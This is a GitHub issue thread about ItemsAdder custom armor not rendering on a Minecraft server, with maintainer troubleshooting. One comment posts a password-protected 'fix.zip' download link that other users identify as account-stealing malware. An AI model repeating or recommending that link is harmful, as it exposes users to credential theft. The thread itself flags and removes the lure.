### ISSUE TITLE
Can't see custom armor or craft iron gear

### ISSUE THREAD

**Issue by iFranticman** [PluginBugs/Issues-ItemsAdder#3926]
### Terms

- [X] I'm using the very latest version of ItemsAdder and its dependencies.
- [X] I am sure this is a bug and it is not caused by a misconfiguration or by another plugin.
- [X] I've looked for already existing issues on the [Issue Tracker](https://github.com/PluginBugs/Issues-ItemsAdder/issues) and haven't found any.
- [X] I already searched on the [plugin wiki](https://itemsadder.devs.beer/) to know if a solution is already known.
- [X] I already searched on the [forums](https://forum.devs.beer/) to check if anyone already has a solution for this.
- [X] I tested this with just ItemsAdder and its dependencies and with a vanilla client of the same version as the Server.

### Discord Username (optional)

iFrantic

### What happened?

Can't view custom armor or create iron armor

### Steps to reproduce the issue

n/a

### Server version

1.20.6

### ItemsAdder Version

latest testing version you just published today 4.0.2-alpha-test-7

### ProtocolLib Version

latest testing version you just published today 4.0.2-alpha-test-7

### LoneLibs Version

latest testing version you just published today 4.0.2-alpha-test-7

### Full Server Log

No need as it's not throwing error

### Screenshots/Videos (you can drag and drop files or paste links)

![image](https://github.com/user-attachments/assets/c853baea-8837-4ce3-8473-26f57a2f888b)
![image](https://github.com/user-attachments/assets/a8709c20-64bb-4311-adcd-4395f158fa65)
![image](https://github.com/user-attachments/assets/38573ea0-262d-47cc-8556-7b157cd578f5)

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by Andre601** [comment]
> The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

Comment has been removed.

For further context, see #3925

**Comment by Andre601** [comment]
@iFranticman Please properly fill out the issue. You for example put the wrong plugin versions and also didn't provide logs. We don't just ask for logs because of errors, but because it gives is important context to work with.

**Comment by iFranticman** [comment]
https://mclo.gs/VJmFuVo
Ignore the Advanced skills problem

**Comment by iFranticman** [comment]
CosmeticsCore_1.3.0-release-1.jar also won't work for me either idk why problem with remapping i guess

**Comment by LoneDev6** [comment]
Custom armors work fine for me.

```
This server is running Paper version 1.21.1-40-master@2fdb2e9
ItemsAdder version 4.0.2-alpha-test-8
```

https://itemsadder.devs.beer/plugin-usage/adding-content/armors/custom-textured-armor

![image](https://github.com/user-attachments/assets/97d2a7d0-c5a8-42cf-8ad9-ed14cf5601a2)

**Comment by iFranticman** [comment]
So i reached out to elitecreatures and they did a deep dive and it's itemsadder not rendering my items.

**Comment by LoneDev6** [comment]
Try to load the example armor and let me know if it works or not.
Let me know how it goes, so that I can understand if it's a client bug, misconfiguration, plugin bug or elite creatures pack misconfiguration.

**Comment by Andre601** [comment]
CosmeticsCore simply doesn't support 1.20.6+ yet from what I know.
Tho, that is not for this issue tracker.

**Comment by iFranticman** [comment]
This is still happening after updating to latest versions.
![image](https://github.com/user-attachments/assets/101a64d3-8211-444f-96dc-df2bbe83a637)
![image](https://github.com/user-attachments/assets/5a7ca843-1177-4d80-913d-33da3fb361ce)
Even default is not working.
